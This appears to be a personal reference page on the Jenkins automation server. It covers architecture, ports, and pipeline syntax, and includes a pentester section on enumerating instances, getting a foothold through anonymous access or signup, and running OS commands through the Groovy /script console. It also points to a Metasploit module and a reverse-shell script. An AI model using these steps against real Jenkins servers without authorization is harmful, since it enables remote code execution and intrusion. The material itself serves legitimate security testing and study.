Jenkins
Jenkins is an open-source automation server. It does not host code itself; it connects to a Git server such as GitLab or GitHub and runs CI/CD workflows against the repositories hosted there.
- GitHub (22.2k ⭐)
- User Documentation
The biggest strength of Jenkins is its plugin ecosystem: plugins to visualize CI results (tests, coverage, ...), to talk to SCMs, clouds, chat tools and so on. Plugins are also the largest attack surface, since they run inside the same JVM as the core.
Jenkins is written in Java; Groovy is used for pipelines (Jenkinsfile), the script console and many plugins. It ships as a WAR with an embedded servlet container (Winstone, a Jetty wrapper), which is how it is usually started (java -jar jenkins.war); it can also be deployed into Apache Tomcat.
Ports: 8080 (HTTP web UI and REST API) and 50000 (inbound TCP agent port, historically called the "JNLP" port, used for controller/agent traffic; the number is configurable, 50000 is what the official Docker image exposes).
Jenkins does not use a database: configuration, jobs, build history and credentials live as XML and files under JENKINS_HOME. Authentication can stay with the built-in user database or be delegated to LDAP / Active Directory.
Jenkins Pentester Notes ⚠️
Useful reference: pwn_jenkins (1.9k ⭐).
Enumeration
- Try to access the login page (/login); the X-Jenkins response header gives the exact version.
- Check what anonymous can reach: /api/json (REST API), /asynchPeople/ (user list), /script (script console), /signup (self-registration). A 302 to /login means "no"; a 200 with content means "yes".
Foothold
- Some Jenkins instances don't have authentication
- Some Jenkins instances may allow us to create accounts (/signup); a fresh account often has Overall/Read or even job-build rights by default
Exploitation
The /script endpoint (the script console) executes arbitrary Groovy inside the controller's JVM, as the OS user Jenkins runs as. It needs Overall/Administer (older versions: Overall/RunScripts). The form POSTs the code in a single "script" parameter and, when CSRF protection is on, a crumb obtained from /crumbIssuer/api/json; /scriptText is the same endpoint returning plain text instead of the HTML page.

```groovy
// Run a command and capture both stdout and stderr without deadlocking on large output
def command = "ls /"
def stdout = new StringBuffer(), stderr = new StringBuffer()
def process = command.execute()          // String.execute() splits on whitespace; no shell involved
process.consumeProcessOutput(stdout, stderr)
process.waitForOrKill(1000)              // kill after 1 s; raise this for slow commands
def exitCode = process.exitValue()
def output = stderr + stdout
println("Exit Code: ${exitCode}")
println("Output:\n${output}")
```
➡️ See also: revsh.groovy (0.1k ⭐).
Additional Notes For /script
Metasploit: exploit/multi/http/jenkins_script_console.

```groovy
// Runtime.exec variant; waitFor() alone shows nothing in the console, so print stdout
r = Runtime.getRuntime()
p = r.exec(["/bin/ls", "-la"] as String[])
p.waitFor()
println(p.text)
```

Windows:

```groovy
def cmd = "cmd.exe /c dir".execute()
println("${cmd.text}")
```
To-do
Stuff I found but haven't read or used yet.
- controller/agents (formerly master/slaves, a.k.a. workers)
- freestyle projects (web interface) vs pipeline jobs (as code)
- Jenkinsfile (Groovy)
- /var/lib/jenkins/ (JENKINS_HOME for the Debian/RHEL packages; the official Docker image uses /var/jenkins_home)
Basic file (declarative Jenkinsfile)

```groovy
pipeline {
    agent any                         // run on any available agent
    stages {
        stage('xxx') {
            steps {
                // Either checkout form works; the second pins the branch to the one being built
                git 'https://github.com/example/my-java-app.git'
                git branch: env.BRANCH_NAME, url: 'URL'
                sh 'xxx'              // shell step, runs on the agent
            }
        }
    }
}
```
Add options

```groovy
options {
    buildDiscarder(logRotator(numToKeepStr: '10', daysToKeepStr: '7'))
}
```
Poll SCM or webhooks to trigger a pipeline

```groovy
triggers {
    cron('H H(0-7) * * 1-5')          // H spreads the minute/hour; weekdays between 00:00 and 07:59
    pollSCM('H/15 * * * *')           // poll the repo roughly every 15 min
    // Webhooks come from plugins, e.g. githubPush() from the GitHub plugin, not from a core trigger
}
```
Artifacts are the output of the build

```groovy
post {
    always {
        junit '*.xml'                 // publish test results even when the build failed
    }
    success {
        archiveArtifacts '*.xml'      // keep build output attached to the build
    }
}
```
Bonus

```groovy
stage('xxx') {
    when {
        branch 'development'          // only run this stage for the development branch
    }
    steps {
        sh 'xxx'                      // a stage needs at least one step to be valid
    }
}

// https://plugins.jenkins.io/warnings-ng/
recordIssues(
    tools: [clangTidy(pattern: 'clang-tidy-report.txt')]
)
```